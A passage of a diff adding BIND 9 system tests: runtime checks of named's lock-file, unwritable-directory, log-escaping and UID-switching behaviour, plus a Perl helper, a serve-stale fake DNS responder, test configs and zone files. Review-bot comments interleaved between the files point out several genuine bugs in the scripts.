+copy_setports ns2/named-alt4.conf.in ns2/named-alt4.conf
+copy_setports ns2/named-alt5.conf.in ns2/named-alt5.conf
+copy_setports ns2/named-alt6.conf.in ns2/named-alt6.conf
+copy_setports ns2/named-alt7.conf.in ns2/named-alt7.conf
+
+mkdir ns2/nope
+
+if [ 1 = "${CYGWIN:-0}" ]
+then
+ setfacl -s user::r-x,group::r-x,other::r-x ns2/nope
+else
+ chmod 555 ns2/nope
+fi
diff --git a/bin/tests/system/runtime/tests.sh b/bin/tests/system/runtime/tests.sh
new file mode 100644
index 0000000..d5e4277
--- /dev/null
+++ b/bin/tests/system/runtime/tests.sh
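Review bot: `chmod 555 ns2/nope` at the end of setup.sh makes the directory unwritable only for an unprivileged user; a process running as root can still write to it. tests.sh in this commit has a branch that runs when `id -u` is 0, so the "is not writable" cases built on this directory may behave differently there, depending on how named checks writability, which this hunk does not show. A comment such as `# 555 is not enforced for root; the not-writable tests assume an unprivileged run` would record the assumption. Separately, under `#!/bin/sh -e` the bare `mkdir ns2/nope` aborts setup if clean.sh ever leaves the directory behind; `mkdir -p ns2/nope` tolerates that.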
@@ -0,0 +1,254 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" +NAMED_DEFAULT_ARGS="-m record,size,mctx -d 99 -g -U 4" + +kill_named() { + pidfile="${1}" + if [ ! -r "${pidfile}" ]; then + return 1 + fi + + pid=$(cat "${pidfile}" 2>/dev/null) + if [ "${pid:+set}" = "set" ]; then + $KILL -15 "${pid}" >/dev/null 2>&1 + retries=10 + while [ "$retries" -gt 0 ]; do + if ! $KILL -0 "${pid}" >/dev/null 2>&1; then + break + fi + sleep 1 + retries=$((retries-1)) + done + # Timed-out + if [ "$retries" -eq 0 ]; then + echo_i "failed to kill named ($pidfile)" + return 1 + fi + fi + rm -f "${pidfile}" + return 0 +} + +check_named_log() { + grep "$@" >/dev/null 2>&1 +} + +run_named() ( + dir="$1" + shift + run="$1" + shift + if cd "$dir" > /dev/null 2>&1 + then + "${NAMED}" "$@" ${NAMED_DEFAULT_ARGS} >> "$run" 2>&1 & + echo $! + fi +) + +check_pid() ( + return $(! 
$KILL -0 "${1}" >/dev/null 2>&1) +) + +status=0 +n=0 + +n=$((n+1)) +echo_i "verifying that named started normally ($n)" +ret=0 +[ -s ns2/named.pid ] || ret=1 +grep "unable to listen on any configured interface" ns2/named.run > /dev/null && ret=1 +grep "another named process" ns2/named.run > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verifying that named checks for conflicting named processes ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt2.conf -D runtime-ns2-extra-2 -X named.lock) +test -n "$testpid" || ret=1 +retry_quiet 10 check_named_log "another named process" ns2/named$n.run || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +test -n "$testpid" && $KILL -15 $testpid > kill$n.out 2>&1 && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verifying that 'lock-file none' disables process check ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt3.conf -D runtime-ns2-extra-3) +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep "another named process" ns2/named$n.run > /dev/null && ret=1 +kill_named ns2/named-alt3.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to reconfigure if working directory is not writable ($n)" +ret=0 +copy_setports ns2/named-alt4.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 && ret=1 +grep "failed: permission denied" rndc.out.$n > /dev/null 2>&1 || ret=1 +sleep 1 +grep "[^-]directory './nope' is not writable" ns2/named.run > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to reconfigure if 
managed-keys-directory is not writable ($n)" +ret=0 +copy_setports ns2/named-alt5.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 && ret=1 +grep "failed: permission denied" rndc.out.$n > /dev/null 2>&1 || ret=1 +sleep 1 +grep "managed-keys-directory './nope' is not writable" ns2/named.run > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to reconfigure if new-zones-directory is not writable ($n)" +ret=0 +copy_setports ns2/named-alt6.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 && ret=1 +grep "failed: permission denied" rndc.out.$n > /dev/null 2>&1 || ret=1 +sleep 1 +grep "new-zones-directory './nope' is not writable" ns2/named.run > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named recovers when configuration file is valid again ($n)" +ret=0 +copy_setports ns2/named1.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reconfig > rndc.out.$n 2>&1 || ret=1 +[ -s ns2/named.pid ] || ret=1 +kill_named ns2/named.pid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to start if working directory is not writable ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt4.conf -D runtime-ns2-extra-4) +test -n "$testpid" || ret=1 +retry_quiet 10 check_named_log "exiting (due to fatal error)" ns2/named$n.run || ret=1 +grep "[^-]directory './nope' is not writable" ns2/named$n.run > /dev/null 2>&1 || ret=1 +kill_named ns2/named.pid && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to start if managed-keys-directory is not writable ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt5.conf -D runtime-ns2-extra-5) +test -n 
"$testpid" || ret=1 +retry_quiet 10 check_named_log "exiting (due to fatal error)" ns2/named$n.run || ret=1 +grep "managed-keys-directory './nope' is not writable" ns2/named$n.run > /dev/null 2>&1 || ret=1 +kill_named named.pid && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named refuses to start if new-zones-directory is not writable ($n)" +ret=0 +testpid=$(run_named ns2 named$n.run -c named-alt6.conf -D runtime-ns2-extra-6) +test -n "$testpid" || ret=1 +retry_quiet 10 check_named_log "exiting (due to fatal error)" ns2/named$n.run || ret=1 +grep "new-zones-directory './nope' is not writable" ns2/named$n.run > /dev/null 2>&1 || ret=1 +kill_named ns2/named.pid && ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named logs control characters in octal notation ($n)" +ret=0 +INSTANCE_NAME="runtime-ns2-extra-7-$(cat ctrl-chars)" +testpid=$(run_named ns2 named$n.run -c named-alt7.conf -D "${INSTANCE_NAME}") +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep 'running as.*\\177\\033' ns2/named$n.run > /dev/null || ret=1 +kill_named ns2/named.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named escapes special characters in the logs ($n)" +ret=0 +INSTANCE_NAME="runtime-ns2-extra-8-$;" +testpid=$(run_named ns2 named$n.run -c named-alt7.conf -D "${INSTANCE_NAME}") +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep 'running as.*\\$\\;' ns2/named$n.run > /dev/null || ret=1 +kill_named ns2/named.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret 
-ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that named logs an ellipsis when the command line is larger than 8k bytes ($n)" +ret=0 +LONG_CMD_LINE=$(cat long-cmd-line) +# shellcheck disable=SC2086 +testpid=$(run_named ns2 named$n.run $LONG_CMD_LINE -c "named-alt7.conf") +test -n "$testpid" || ret=1 +retry_quiet 60 check_named_log "running$" ns2/named$n.run || ret=1 +grep "running as.*\.\.\.$" ns2/named$n.run > /dev/null || ret=1 +kill_named ns2/named.pid || ret=1 +test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verifying that named switches UID ($n)" +if [ "$(id -u)" -eq 0 ] && [ -z "$CYGWIN" ]; then + ret=0 + TEMP_NAMED_DIR=$(mktemp -d "$(pwd)/ns2/tmp.XXXXXXXX") + if [ "$?" -eq 0 ]; then + copy_setports ns2/named-alt9.conf.in "${TEMP_NAMED_DIR}/named-alt9.conf" + export SOFTHSM2_CONF="${TEMP_NAMED_DIR}/softhsm2.conf" + sh "$TOP/bin/tests/prepare-softhsm2.sh" + chown -R nobody: "${TEMP_NAMED_DIR}" + chmod 0700 "${TEMP_NAMED_DIR}" + testpid=$(run_named "${TEMP_NAMED_DIR}" "${TEMP_NAMED_DIR}/named$n.run" -u nobody -c named-alt9.conf) + test -n "$testpid" || ret=1 + retry_quiet 60 check_named_log "running$" "${TEMP_NAMED_DIR}/named$n.run" || ret=1 + [ -s "${TEMP_NAMED_DIR}/named9.pid" ] || ret=1 + grep "loading configuration: permission denied" "${TEMP_NAMED_DIR}/named$n.run" > /dev/null && ret=1 + kill_named "${TEMP_NAMED_DIR}/named9.pid" || ret=1 + test -n "$testpid" && retry_quiet 10 check_pid $testpid || ret=1 + else + echo_i "mktemp failed" + ret=1 + fi + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipped, not running as root or running on Windows" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/send.pl b/bin/tests/system/send.pl new file mode 100644 index 0000000..62b4f7a --- /dev/null +++ b/bin/tests/system/send.pl 
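Review bot: In the "refuses to start if managed-keys-directory is not writable" case of tests.sh, `kill_named named.pid && ret=1` passes a path without the `ns2/` prefix that the two sibling start-up cases use. kill_named returns 1 as soon as the pid file is not readable, so with this path the check presumably can never set `ret=1`, even if named did start and wrote ns2/named.pid. The line should read `kill_named ns2/named.pid && ret=1`. Separately, `set -e` is active, so a failing `TEMP_NAMED_DIR=$(mktemp -d ...)` ends the script before `[ "$?" -eq 0 ]` is evaluated and the "mktemp failed" branch looks unreachable; `if TEMP_NAMED_DIR=$(mktemp -d ...); then` would keep that branch live.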
@@ -0,0 +1,33 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Send a file to a given address and port using TCP. Used for
+# configuring the test server in ans.pl.
+#
+
+use IO::File;
+use IO::Socket;
+
+@ARGV == 2 or die "usage: send.pl host port [file ...]\n";
+
+my $host = shift @ARGV;
+my $port = shift @ARGV;
+
+my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
+ Proto => "tcp",) or die "$!";
+while (<>) {
+ $sock->syswrite($_, length $_);
+}
+
+$sock->close;
diff --git a/bin/tests/system/serve-stale/ans2/ans.pl b/bin/tests/system/serve-stale/ans2/ans.pl
new file mode 100644
index 0000000..3fdc1fc
--- /dev/null
+++ b/bin/tests/system/serve-stale/ans2/ans.pl
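Review bot: The argument check in send.pl, `@ARGV == 2 or die "usage: send.pl host port [file ...]\n";`, contradicts its own usage text: any file argument pushes the count above 2 and the script dies, so `while (<>)` can only ever read standard input. If file arguments are meant to work, the check should be `@ARGV >= 2 or die "usage: send.pl host port [file ...]\n";`. The return value of `$sock->syswrite($_, length $_)` is also ignored, so a failed write to the control socket goes unnoticed; `defined $sock->syswrite($_, length $_) or die "$!";` would surface it.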
@@ -0,0 +1,331 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use IO::Socket; +use Getopt::Long; +use Net::DNS; +use Time::HiRes qw(usleep nanosleep); + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +# If send_response is set, the server will respond, otherwise the query will +# be dropped. +my $send_response = 1; +# If slow_response is set, a lookup for the CNAME target (target.example) is +# delayed. Other lookups will not be delayed. +my $slow_response = 0; + +my $localaddr = "10.53.0.2"; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$localaddr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +# +# Delegation +# +my $SOA = "example 300 IN SOA . . 0 0 0 0 300"; +my $NS = "example 300 IN NS ns.example"; +my $A = "ns.example 300 IN A $localaddr"; + +# +# Slow delegation +# +my $slowSOA = "slow 300 IN SOA . . 0 0 0 0 300"; +my $slowNS = "slow 300 IN NS ns.slow"; +my $slowA = "ns.slow 300 IN A $localaddr"; +my $slowTXT = "data.slow 2 IN TXT \"A slow text record with a 2 second ttl\""; +my $slownegSOA = "slow 2 IN SOA . . 
0 0 0 0 300"; + +# +# Records to be TTL stretched +# +my $TXT = "data.example 2 IN TXT \"A text record with a 2 second ttl\""; +my $LONGTXT = "longttl.example 600 IN TXT \"A text record with a 600 second ttl\""; +my $CAA = "othertype.example 2 IN CAA 0 issue \"ca1.example.net\""; +my $negSOA = "example 2 IN SOA . . 0 0 0 0 300"; +my $CNAME = "cname.example 7 IN CNAME target.example"; +my $TARGET = "target.example 9 IN A $localaddr"; +my $SHORTCNAME = "shortttl.cname.example 1 IN CNAME longttl.target.example"; +my $LONGTARGET = "longttl.target.example 600 IN A $localaddr"; + +sub reply_handler { + my ($qname, $qclass, $qtype) = @_; + my ($rcode, @ans, @auth, @add); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + # Control whether we send a response or not. + # We always respond to control commands. + if ($qname eq "enable" ) { + if ($qtype eq "TXT") { + $send_response = 1; + my $rr = new Net::DNS::RR("$qname 0 $qclass TXT \"$send_response\""); + push @ans, $rr; + } + $rcode = "NOERROR"; + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); + } elsif ($qname eq "disable" ) { + if ($qtype eq "TXT") { + $send_response = 0; + my $rr = new Net::DNS::RR("$qname 0 $qclass TXT \"$send_response\""); + push @ans, $rr; + } + $rcode = "NOERROR"; + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); + } elsif ($qname eq "slowdown" ) { + if ($qtype eq "TXT") { + $send_response = 1; + $slow_response = 1; + my $rr = new Net::DNS::RR("$qname 0 $qclass TXT \"$send_response\""); + push @ans, $rr; + } + $rcode = "NOERROR"; + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); + } + + # If we are not responding to queries we are done. + return if (!$send_response); + + if (index($qname, "latency") == 0) { + # simulate network latency before answering + print " Sleeping 50 milliseconds\n"; + select(undef, undef, undef, 0.05); + } + + # Construct the response and send it. 
+ if ($qname eq "ns.example" ) { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($A); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($SOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "example") { + if ($qtype eq "NS") { + my $rr = new Net::DNS::RR($NS); + push @auth, $rr; + $rr = new Net::DNS::RR($A); + push @add, $rr; + } elsif ($qtype eq "SOA") { + my $rr = new Net::DNS::RR($SOA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($SOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "nodata.example") { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "data.example") { + if ($qtype eq "TXT") { + my $rr = new Net::DNS::RR($TXT); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "a-only.example") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR("a-only.example 2 IN A $localaddr"); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "cname.example") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($CNAME); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "target.example") { + if ($slow_response) { + print " Sleeping 3 seconds\n"; + sleep(3); + } + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($TARGET); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "shortttl.cname.example") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($SHORTCNAME); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "longttl.target.example") { + if ($slow_response) { + print " Sleeping 3 seconds\n"; + sleep(3); + } + if ($qtype eq "A") { + my $rr = new 
Net::DNS::RR($LONGTARGET); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "longttl.example") { + if ($qtype eq "TXT") { + my $rr = new Net::DNS::RR($LONGTXT); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "nxdomain.example") { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + $rcode = "NXDOMAIN"; + } elsif ($qname eq "othertype.example") { + if ($qtype eq "CAA") { + my $rr = new Net::DNS::RR($CAA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($negSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "ns.slow" ) { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR($slowA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($slowSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "slow") { + if ($qtype eq "NS") { + my $rr = new Net::DNS::RR($slowNS); + push @auth, $rr; + $rr = new Net::DNS::RR($slowA); + push @add, $rr; + } elsif ($qtype eq "SOA") { + my $rr = new Net::DNS::RR($slowSOA); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($slowSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "data.slow") { + if ($slow_response) { + print " Sleeping 3 seconds\n"; + sleep(3); + # only one time + $slow_response = 0; + } + if ($qtype eq "TXT") { + my $rr = new Net::DNS::RR($slowTXT); + push @ans, $rr; + } else { + my $rr = new Net::DNS::RR($slownegSOA); + push @auth, $rr; + } + $rcode = "NOERROR"; + } else { + my $rr = new Net::DNS::RR($SOA); + push @auth, $rr; + $rcode = "NXDOMAIN"; + } + + # mark the answer as authoritative (by setting the 'aa' flag) + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); +} + +GetOptions( + 'port=i' => \$localport, +); + +my $rin; +my $rout; + +for (;;) { + $rin = ''; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, 
fileno($udpsock), 1)) { + my ($buf, $request, $err); + $udpsock->recv($buf, 512); + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qclass = $questions[0]->qclass; + my $qtype = $questions[0]->qtype; + my $id = $request->header->id; + + my ($rcode, $ans, $auth, $add, $headermask) = reply_handler($qname, $qclass, $qtype); + + if (!defined($rcode)) { + print " Silently ignoring query\n"; + next; + } + + my $reply = Net::DNS::Packet->new(); + $reply->header->qr(1); + $reply->header->aa(1) if $headermask->{'aa'}; + $reply->header->id($id); + $reply->header->rcode($rcode); + $reply->push("question", @questions); + $reply->push("answer", @$ans) if $ans; + $reply->push("authority", @$auth) if $auth; + $reply->push("additional", @$add) if $add; + + my $num_chars = $udpsock->send($reply->data); + print " Sent $num_chars bytes via UDP\n"; + } +} diff --git a/bin/tests/system/serve-stale/clean.sh b/bin/tests/system/serve-stale/clean.sh new file mode 100644 index 0000000..b4a0d50 --- /dev/null +++ b/bin/tests/system/serve-stale/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out* +rm -f ns*/named.conf +rm -f ns*/root.bk +rm -f rndc.out.test* +rm -f */named.run */named.memstats +rm -f ns*/managed-keys.bind* +rm -f ns*/named_dump* +rm -f ns*/named.stats* +rm -f ns*/named.run.prev 
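Review bot: In serve-stale/ans2/ans.pl, `GetOptions('port=i' => \$localport)` runs after `$udpsock` has already been bound with `LocalPort => $localport`, so a `--port` argument is parsed but never reaches the listening socket; only the PORT environment variable or the 5300 fallback does. Moving the `GetOptions(...)` call above the `IO::Socket::INET->new(...)` call makes the option effective. The receive loop also dies on a datagram that fails to parse and uses `$questions[0]` without checking that a question is present, so one stray packet stops the fixture. Logging the problem and continuing with `next` would be more robust for a test server.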
diff --git a/bin/tests/system/serve-stale/ns1/named1.conf.in b/bin/tests/system/serve-stale/ns1/named1.conf.in
new file mode 100644
index 0000000..c0dd5b8
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns1/named1.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ max-stale-ttl 3600;
+ stale-answer-ttl 4;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-refresh-time 30;
+ servfail-ttl 0;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/serve-stale/ns1/named2.conf.in b/bin/tests/system/serve-stale/ns1/named2.conf.in
new file mode 100644
index 0000000..985cddb
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns1/named2.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ max-stale-ttl 20;
+ stale-answer-ttl 3;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ servfail-ttl 0;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/serve-stale/ns1/named3.conf.in b/bin/tests/system/serve-stale/ns1/named3.conf.in
new file mode 100644
index 0000000..23f1baa
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns1/named3.conf.in
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ max-stale-ttl 20;
+ stale-answer-ttl 3;
+ stale-answer-enable yes;
+ stale-cache-enable yes;
+ stale-refresh-time 0;
+ servfail-ttl 0;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "stale.test" {
+ type primary;
+ file "stale.test.db";
+};
diff --git a/bin/tests/system/serve-stale/ns1/root.db b/bin/tests/system/serve-stale/ns1/root.db
new file mode 100644
index 0000000..aef8e31
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns1/root.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 300 SOA . . 0 0 0 0 0
+. 300 NS ns.nil.
+ns.nil. 300 A 10.53.0.1
+example. 300 NS ns.example.
+ns.example. 300 A 10.53.0.2
+slow. 300 NS ns.slow.
+ns.slow. 300 A 10.53.0.2
diff --git a/bin/tests/system/serve-stale/ns1/stale.test.db b/bin/tests/system/serve-stale/ns1/stale.test.db
new file mode 100644
index 0000000..d389e7c
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns1/stale.test.db
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN stale.test.
+stale.test. 300 SOA . . 0 0 0 0 0
+stale.test. 300 NS ns.stale.test.
+ns.stale.test. 300 A 10.53.0.1
+cname1.stale.test. 1 CNAME a1.stale.test.
+a1.stale.test. 1 A 192.0.2.1
+cname2.stale.test. 1 CNAME a2.stale.test.
+a2.stale.test. 300 A 192.0.2.2
diff --git a/bin/tests/system/serve-stale/ns3/named1.conf.in b/bin/tests/system/serve-stale/ns3/named1.conf.in
new file mode 100644
index 0000000..09ad864
--- /dev/null
+++ b/bin/tests/system/serve-stale/ns3/named1.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
